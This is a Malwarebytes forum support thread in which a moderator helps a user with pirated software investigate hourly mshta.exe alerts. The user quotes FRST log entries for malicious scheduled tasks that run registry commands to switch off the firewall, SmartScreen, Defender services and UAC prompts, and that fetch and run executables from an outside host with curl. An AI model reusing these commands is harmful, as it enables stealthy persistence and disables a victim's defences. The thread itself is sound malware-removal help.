Jump to content

Hourly mshta.exe trying to make outbout connections reports from Malwarebyt


Recommended Posts

This topic is a duplicate of https://forums.malwarebytes.com/topic/273271-getting-hourly-reports-of-malwarebytes-blocking-mshta-malware/

I have followed the steps, but I need help analyzing my FRST.txt report.

Important notes:

- Pirated software has been installed in the system
- Malwarebytes and AVAST scans failed to detect the root issue.
- I'm still on my free trial

 

 

FRST.txt

Link to post
Share on other sites

  • Root Admin

Hello  and  :welcome:    @luizh10

 

My screen name is AdvancedSetup and I will assist you with your system issues.
 

Let's keep these principles as we proceed. Make sure to read the entire post below first.

  • Removing pesky malware can be an involved set of tasks over separate runs. Have much patience. Follow my directions. 
  • Please follow all steps in the provided order and post back all requested logs.
  • Please attach all log files to your post, unless otherwise requested.
  • Temporarily disable Microsoft SmartScreen to download software below if needed. Make sure to turn it back on once the scans are completed.
  • Searching, detecting, and removing malware isn't instantaneous and there is no guarantee to repair every system.
  • Before we start, please make sure that you have an external backup of all private data.
  • Do not run online games while your case is ongoing. Do not do any free-wheeling of risky web-surfing.
  • Only run the tools I guide you to use. Please don't run any other scans, download, install or uninstall any programs while I'm working with you unless requested.
  • Cracked, Hacked, or Pirated programs are not only illegal but also can make a computer a malware victim.
    Having such programs installed is the easiest way to get infected. It is the leading cause of ransomware encryption. It is at times also a big source of current Trojan infections. 
    If there are any on the system you should uninstall them before we proceed.  
  • If your system is running Discord, or P2P Torrent software, please be sure to Exit out of it while this case is on-going.


Do these two steps so that ALL Folders & Files are set to SHOW, plus also, Turn OFF Windows Fast start.

Show-Hidden-Folders-Files-Extensions
https://forums.malwarebytes.com/topic/299345-show-hidden-folders-files-extensions/

Disable-Fast-Startup
https://forums.malwarebytes.com/topic/299350-disable-fast-startup/
 

  • Next, please restart Windows

  • Please be patient and stick with me until I give you the "all clear" or otherwise indicate all is good

 

To begin, please do the following so that we may take a closer look at your installation for troubleshooting. This is a report only.

NOTE: The tools and the information obtained are safe and not harmful to your privacy or your computer, please allow the programs to run if blocked by your system security.

  • Download the Malwarebytes Support Tool
  • In your Downloads folder, open the mb-support-x.x.x.xxx.exe file
  • In the User Account Control pop-up window, click Yes to continue the installation
  • Run the MBST Support Tool
  • In the left navigation pane of the Malwarebytes Support Tool, click Advanced
  • In the Advanced Options, click Gather Logs. A status diagram displays the tool is Getting logs from your machine
  • A zip file named mbst-grab-results.zip will be saved to the Public desktop, please upload that file on your next reply

Thank you

 

 

Link to post
Share on other sites

Also, yesterday before your first response a colleague instructed me to look into Task Scheduler. Obviously malicious tasks were executing every two hours under the DirectX directory. I deleted them, but their details can be found in the first FRST.txt attached file. Below is a quote from the FRST.txt indicating the records I deleted. Only the ones calling mshta.exe. Apologies for disobeying, but it was for a good cause.

"Only run the tools I guide you to use. Please don't run any other scans, download, install or uninstall any programs while I'm working with you unless requested."

Quote

Task: {493D0DB6-25CB-440D-8850-A246859C2A31} - System32\Tasks\Microsoft\Windows\DirectX\AccountProtection_MicrosoftAccount_Disconnected => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\NTUSER\SOFTWARE\Microsoft\Windows Security Health\State"" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {B02FE7C0-A5D4-41C8-9F51-B1E10CD297C9} - System32\Tasks\Microsoft\Windows\DirectX\Antimalware => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\EventLog\System\Microsoft-Antimalware-ShieldProvider /v Start /t REG_DWORD /d 4 /f",0)(Window.Close) <==== ATENÇÃO
Task: {093B7DC2-9DE7-4860-9F99-13EBE3FE2C8A} - System32\Tasks\Microsoft\Windows\DirectX\AppAndBrowser_StoreAppsSmartScreenOff => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Microsoft\Windows Security Health\State"" /v AppAndBrowser_StoreAppsSmartScreenOff /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {6902CCBC-3D7B-410B-A9A2-593AC4409A81} - System32\Tasks\Microsoft\Windows\DirectX\EnabledV9 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter /v EnabledV9 /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {FA5B83C8-9B99-4968-A751-CA0E9655EE82} - System32\Tasks\Microsoft\Windows\DirectX\EnabledV92 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter /v EnabledV9 /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {5EE7D868-EBEF-4430-BEDA-199A3717F7F9} - System32\Tasks\Microsoft\Windows\DirectX\EnableFirewall => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile /v EnableFirewall /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {6EE38F2B-596F-47B1-B5FB-32575DE50D98} - System32\Tasks\Microsoft\Windows\DirectX\EnableFirewall2 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PublicProfile /v EnableFirewall /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {5CBD55BE-075B-49BB-9B1F-203844344FCA} - System32\Tasks\Microsoft\Windows\DirectX\EnableFirewall3 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile /v EnableFirewall /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {C21966B9-B90C-436B-8662-07DA738B16FF} - System32\Tasks\Microsoft\Windows\DirectX\EnableSmartScreen => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\System /v EnableSmartScreen /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {DEAA4D8D-E61A-4DD2-8DD5-0A9971903931} - System32\Tasks\Microsoft\Windows\DirectX\EnableWebContentEvaluation => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost /v EnableWebContentEvaluation /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {040631E7-9A5A-4F65-AED6-050DEB07117F} - System32\Tasks\Microsoft\Windows\DirectX\EnableWebContentEvaluation2 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\NTUSER\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost /v EnableWebContentEvaluation /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {537E4952-F771-4231-B90F-7904BDB94D95} - System32\Tasks\Microsoft\Windows\DirectX\MsSecFlt => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f",0)(Window.Close) <==== ATENÇÃO
Task: {D0411F01-7D6E-4AF4-B68A-21C46E2DFC0F} - System32\Tasks\Microsoft\Windows\DirectX\PreventOverride => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost /v PreventOverride /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {7CB45D1C-906B-4D9C-9A11-77F9D7D47BA7} - System32\Tasks\Microsoft\Windows\DirectX\PreventOverride1 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\NTUSER\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost /v PreventOverride /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {36D8316F-4171-43F5-B726-0F4A6C3F9757} - System32\Tasks\Microsoft\Windows\DirectX\PreventOverride2 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter /v PreventOverride /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {82CCC4B4-AC50-438D-B9F5-3CEE07829963} - System32\Tasks\Microsoft\Windows\DirectX\PreventOverride3 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter /v PreventOverride /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {5FBBA474-D25D-4B8C-9201-FAA5BED72AE8} - System32\Tasks\Microsoft\Windows\DirectX\SecurityHealth2 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 030000000000000000000000 /f",0)(Window.Close) <==== ATENÇÃO
Task: {72F12AD6-203E-4605-99C0-A6FE1D5740C8} - System32\Tasks\Microsoft\Windows\DirectX\Sense => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f",0)(Window.Close) <==== ATENÇÃO
Task: {B5D112BE-EC89-4F96-8DD0-B28E4BDFB344} - System32\Tasks\Microsoft\Windows\DirectX\Services CHosted => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c %windir%\system32\curl.exe hxxp://l96.org/c.exe -o %windir%\c.exe & %windir%\c.exe",0)(Window.Close) <==== ATENÇÃO
Task: {7CAD408B-357E-4A04-930A-598DA7C3105F} - System32\Tasks\Microsoft\Windows\DirectX\Services NHosted => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c %windir%\system32\curl.exe hxxp://l96.org/n.exe -o %windir%\n.exe & %windir%\n.exe",0)(Window.Close) <==== ATENÇÃO
Task: {C5812091-153A-4FDE-B7EE-4DA164298413} - System32\Tasks\Microsoft\Windows\DirectX\Services RHosted => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c %windir%\system32\curl.exe hxxp://l96.org/r.exe -o %windir%\r.exe & %windir%\r.exe",0)(Window.Close) <==== ATENÇÃO
Task: {EB6C1338-65DE-4B0E-83DC-EF8302F2752B} - System32\Tasks\Microsoft\Windows\DirectX\UAC Content => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {86186330-3B4D-4CC0-ABAF-8863E6BD233A} - System32\Tasks\Microsoft\Windows\DirectX\UAC Popup => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {7802F7F9-6DBF-41C8-ACD6-373684954445} - System32\Tasks\Microsoft\Windows\DirectX\WinDefend3 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\EventLog\System\WinDefend /v Start /t REG_DWORD /d 4 /f",0)(Window.Close) <==== ATENÇÃO

 

Link to post
Share on other sites

  • Root Admin

You have Avast AV installed. Please check for updates and then do a Full System scan with it and post back the results

 

You also have this running in Google Chrome. Not sure how long you've had it, but maybe this is related?

CHR NewTab: Profile 1 ->  Active:"chrome-extension://laookkfknpbbblfpciffpaejjkokdgca/dashboard.html"

 

It's triggering an exploit protection block that is using cmd.exe to run as well

 

 

Link to post
Share on other sites

Probably had this malware extension for more than a year since that's when I switched to Opera GX browser. Now I rarely open chrome. I'll look into how to completely remove extensions. I'll come back in a few hours with the updated Avast full system scan, however I don't like avast that much that is why I downloaded malwarebytes.

On the subject of Potentially Unwated Programs I should remove from my system... what is your opinion on Hola VPN?

Also, thank you so much for your help so far.

Link to post
Share on other sites

  • Root Admin

I'm not a fan of Hola and neither is the Farbar scanner. It flags it too but I ignored it as I don't think it's a threat.

We have our own VPN - Malwarebytes Privacy VPN (making it clear that obviously there may be a bias there)

I have used the following with good results. Listed in personal preference as they have independent audits of the service

I've used many others over the years but not really worth mentioning them

Mullvad VPN - https://mullvad.net/en

ExpressVPN - https://www.expressvpn.com/

 

I am not a fan of the Opera browser. It used to be an excellent alternative browser, but today they simply do not care about your privacy and try to show and connect everything to everything. To me that is a recipe for too much exposure in today's world where hackers are trying to gather enough data on you to carry out a successful attack on you.

My preference is Firefox, or even Brave over Google Chrome, MS Edge, or Opera

 

If you don't want the Avast then do the scan. Then post the results and go ahead and uninstall Avast. Then restart the computer and get me a new set of logs from the Farbar scanner

 

FRST.TXT
ADDITION.TXT

 

Thanks

 

Link to post
Share on other sites

Avast scan complete. Found 2 unrecognized entries, the rest are an assortment of false positives, used keygens for music software, crypto mining software etc. I don't use them anymore so they can go too.

Can't tell why my FRST scan is in Portuguese but I don't think it really matters. I gave the scans a brief look, can't find anything worth mentioning. Let me know if you find anything, if not I think we can mark this as solved.

image.png

FRST.txt Addition.txt

Link to post
Share on other sites

  • Root Admin

Hello @luizh10

The Farbar scan is mostly in Portuguese due to that being the version of Windows installed.

You have Farbar here:  C:\Users\luiz\Downloads\FRST64.exe  

If you use this other one on your system it will attempt to convert most of it to English

C:\Users\luiz\Downloads\FRSTEnglish.exe 

Some of it may still not be in English but more should be.

 

If you still want to remove Avast, please go ahead and uninstall it and restart the computer.

Then run the Farbar (FRST) program located here, with Admin rights and click the SCAN button.    C:\Users\luiz\Downloads\FRSTEnglish.exe  

Post back as an attachment both of these new files

FRST.TXT
ADDITION.TXT

 

Thanks

 

Link to post
Share on other sites

  • 3 weeks later...
  • Root Admin

Due to the lack of feedback, this topic is closed to prevent others from posting here.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this topic. Other members who need assistance please start your own topic in a new thread.

Tips to help protect from infection

Thanks

 

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.